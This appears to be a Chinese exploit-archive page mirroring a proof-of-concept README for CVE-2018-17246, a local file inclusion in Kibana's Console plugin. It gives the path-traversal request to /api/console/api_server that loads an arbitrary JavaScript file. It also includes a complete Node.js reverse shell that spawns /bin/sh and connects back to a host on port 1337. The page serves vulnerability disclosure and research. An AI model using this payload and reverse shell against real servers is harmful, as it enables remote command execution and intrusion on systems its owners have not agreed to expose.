关联漏洞
标题:
Elasticsearch Kibana Console插件安全漏洞
(CVE-2018-17246)
描述:Elasticsearch Kibana(前称elasticsearch-dashboard)是荷兰Elasticsearch公司的一套开源的、基于浏览器的分析和搜索Elasticsearch仪表板工具。Console是其中的一个控制台插件。 Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console插件存在安全漏洞。攻击者可通过发送请求利用该漏洞在主机操作系统上以Kibana进程权限执行任意命令。
描述
CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13
介绍
# CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13
A Local File Inclusion on Kibana found by [CyberArk Labs](https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/), the LFI can be use to execute a reverse shell on the Kibana server with the following payload:
```
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js
```
As you already guessed, this attack need to be paired with an unrestricted file upload or any other vulnerability that allows you to write a file on the server.
> There is no input validation so we can change the name of the JavaScript file to anything we want. In this case, with the path traversal technique, we can choose any file on the Kibana server.
> One thing to be aware of, however, is node's [module caching](https://nodejs.org/api/modules.html#modules_caching) feature. Essentially, since the LFI works by sending unsanitized user input to node's `require` function, the included module (the attacker's payload) will be cached _by filename_. This means that you cannot send the same payload to, e.g., recover a reverse shell.
**Vulnerability details**: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/
**Security Advisory**: https://www.elastic.co/blog/kibana-local-file-inclusion-flaw-cve-2018-17246
---
* kibana version 6.0.0 from docker (without any ElasticSearch linked the PoC is working)
* shell.js from https://github.com/appsecco/vulnerable-apps/tree/master/node-reverse-shell
```js
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(1337, "172.18.0.1", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
```
文件快照
[4.0K] /data/pocs/19a697573951e6ed8b8e3e03bfd9bf0dd59f9c86
└── [2.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。